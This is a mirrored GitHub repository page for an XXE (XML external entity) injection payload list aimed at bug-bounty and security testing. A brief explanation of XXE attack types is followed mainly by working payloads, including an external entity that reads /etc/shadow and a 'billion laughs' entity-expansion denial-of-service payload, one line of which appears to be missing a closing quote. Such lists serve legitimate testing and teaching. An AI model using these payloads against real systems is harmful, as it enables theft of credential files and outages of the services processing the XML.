External/xxe-injection-payload-list
1
0
Fork 0
mirror of https://github.com/payloadbox/xxe-injection-payload-list.git synced 2025-12-17 17:55:43 +00:00
Code Issues Packages Projects Releases Wiki Activity
6 Commits 2 Branches 0 Tags
Go to file
Clone
Open with VS Code Open with VSCodium Open with Intellij IDEA
Download ZIP Download TAR.GZ Download BUNDLE
İsmail Taşdelen d33a6d50b1
Update README.md
2019-11-19 08:39:06 +03:00
Image
Create xxe-injection.jpg
2019-11-19 08:11:45 +03:00
.gitignore
Initial commit
2019-11-19 08:04:26 +03:00
LICENSE
Update LICENSE
2019-11-19 08:06:00 +03:00
README.md
Update README.md
2019-11-19 08:39:06 +03:00

README.md

XML External Entity (XXE) Injection Payload List

In this section, we'll explain what XML external entity injection is, describe some common examples, explain how to find and exploit various kinds of XXE injection, and summarize how to prevent XXE injection attacks.

What is XML external entity injection?

XML external entity injection (also known as XXE) is a web security vulnerability that allows an attacker to interfere with an application's processing of XML data. It often allows an attacker to view files on the application server filesystem, and to interact with any backend or external systems that the application itself can access.

In some situations, an attacker can escalate an XXE attack to compromise the underlying server or other backend infrastructure, by leveraging the XXE vulnerability to perform server-side request forgery (SSRF) attacks.

There are various types of XXE attacks:

XXE Attack Type Description
Exploiting XXE to Retrieve Files Where an external entity is defined containing the contents of a file, and returned in the application's response.
Exploiting XXE to Perform SSRF Attacks Where an external entity is defined based on a URL to a back-end system.
Exploiting Blind XXE Exfiltrate Data Out-of-Band Where sensitive data is transmitted from the application server to a system that the attacker controls.
Exploiting blind XXE to Retrieve Data Via Error Messages Where the attacker can trigger a parsing error message containing sensitive data.
XML External Entity (XXE) Injection Payloads
XXE: Basic XML Example
<!--?xml version="1.0" ?-->
<userInfo>
 <firstName>John</firstName>
 <lastName>Doe</lastName>
</userInfo>
XXE: Entity Example
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY example "Doe"> ]>
 <userInfo>
  <firstName>John</firstName>
  <lastName>&example;</lastName>
 </userInfo>
XXE: File Disclosure
<!--?xml version="1.0" ?-->
<!DOCTYPE replace [<!ENTITY ent SYSTEM "file:///etc/shadow"> ]>
<userInfo>
 <firstName>John</firstName>
 <lastName>&ent;</lastName>
</userInfo>
XXE: Denial-of-service Example
<!--?xml version="1.0" ?-->
<!DOCTYPE lolz [<!ENTITY lol "lol"><!ELEMENT lolz (#PCDATA)>
<!ENTITY lol1 "&lol;&lol;&lol;&lol;&lol;&lol;&lol;
<!ENTITY lol2 "&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;&lol1;">
<!ENTITY lol3 "&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;&lol2;">
<!ENTITY lol4 "&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;&lol3;">
<!ENTITY lol5 "&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;&lol4;">
<!ENTITY lol6 "&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;&lol5;">
<!ENTITY lol7 "&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;&lol6;">
<!ENTITY lol8 "&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;&lol7;">
<!ENTITY lol9 "&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;&lol8;">
<tag>&lol9;</tag>

References :

👉 XML External Entity (XXE) Processing

👉 XML External Entity Prevention Cheat Sheet

👉 Testing for XML Injection (OTG-INPVAL-008)

Description
🎯 XML External Entity (XXE) Injection Payload List
bug-bountybugbountycyber-securitycybersecurityhackinginformation-securityinfosecpayloadpayloadsweb-application-securitywebsecuritywebsecurity-referencexmlxml-entityxxexxe-examplexxe-injectionxxe-payloadxxe-payload-listxxe-payloads
Readme MIT 95 KiB
Languages
Text 100%